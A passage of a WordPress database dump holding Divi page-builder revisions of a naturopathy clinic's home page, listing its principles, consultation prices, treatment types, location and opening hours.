header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat; font-weight:;\">Flower essences </span>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.8\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.8\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" border_color_left=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" inline_fonts=\"Playfair Display\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22border_color_all%22,%22border_color_left%22%93}\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||3px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Location</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & Mundaring</span><br /><span style=\"font-family: Montserrat;\">Online consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed/Thurs: 9am-5pm</span><br /><span style=\"font-family: Montserrat;\">Alternate Saturdays: 9am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2021-06-15 12:40:51','2021-06-15 04:40:51','',28,'https://verdenaturopathy.com.au/?p=325',0,'revision','',0),(319,1,'2021-06-04 20:54:18','2021-06-04 12:54:18','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Make the shift to a more holistic approach to your health</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat; \">Naturopathy views health not merely as the absence of disease but by the presence of vitality, promoting the synergy of mental, emotional and physical health within the body. We are guided by the six naturopathic principles, utilising these to help us form evidence-based treatment plans that encompass the person as a whole:</span><span style=\"font-family: Montserrat;\"></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat; \">first, do no harm</span></li>\n<li><span style=\"font-family: Montserrat; ;\">the healing power of nature</span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">identify and treat the cause </span></li>\n<li><span style=\"font-size: 16px;font-family: Montserrat; \">doctor as teacher</span></li>\n<li><span style=\"font-family: Montserrat; \">treat the person as a whole<span style=\"font-size: 16px;\"></span></span></li>\n<li><span style=\"font-family: Montserrat; \">prevention</span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20210503_205936_105.jpg\" title_text=\"IMG_20210503_205936_105\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|75|75|100|1|0|-1\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20200714_175859_865.jpg\" title_text=\"IMG_20200714_175859_865\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.9.4\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\" custom_padding=\"7px|||||\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Consultations</span></h2>\n<p><span style=\"font-size: x-large; font-family: Montserrat;\">Choose from face-to-face or online consults</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" module_alignment=\"center\" custom_margin=\"||||false|false\" custom_padding=\"0px|0px|0px|0px|true|false\" hover_enabled=\"0\" border_radii=\"off||||\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\" sticky_enabled=\"0\"][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\" custom_padding=\"|0px||0px|false|false\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" title_text=\"4-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial consult (75 min) - $120\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span></p>\n<p><span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span></p>\n<p><span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Follow-up consult (45 min) - $80\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on. </span><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Express consult (20 min) - $40\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies, emotional health issues or script reviews. Not suitable for long-term or chronic health issues.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ffffff\" module_alignment=\"center\" custom_padding=\"0px||0px||false|false\" border_width_all=\"1px\" max_width=\"1082px\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\" custom_padding=\"10px||10px||false|false\" background_color=\"#ffffff\" text_font=\"Montserrat||||||||\"]<p style=\"text-align: center;\">Discounts available for children under 12, students and seniors</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Liquid herbal blends</span><span style=\"font-family: Montserrat; font-weight: normal;\"></span>\nCapsules/tablets<span style=\"font-family: Montserrat;\"></span>\nTeas\nTopical creams\n [/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Food as medicine</span>\n<span style=\"font-family: Montserrat;\">Nutritional compounds</span>\n<span style=\"font-family: Montserrat;\">Supplements</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/1-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Stress strategies</span>\n<span style=\"font-family: Montserrat;\">Exercise and movement</span>\n<span style=\"font-family: Montserrat;\">Mindfulness </span>\n<span style=\"font-family: Montserrat;\">Sleep support</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat; font-weight:;\">Flower essences </span>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.8\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.8\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" border_color_left=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" inline_fonts=\"Playfair Display\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22border_color_all%22,%22border_color_left%22%93}\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||3px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Location</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed/Thurs: 9am-5pm</span><br /><span style=\"font-family: Montserrat;\">Alternate Saturdays: 9am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2021-06-04 20:54:18','2021-06-04 12:54:18','',28,'https://verdenaturopathy.com.au/?p=319',0,'revision','',0),(79,1,'2021-05-01 10:44:53','2021-05-01 02:44:53','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.4.7\" background_color=\"#f9f3eb\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(249,243,235,0.8)\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" 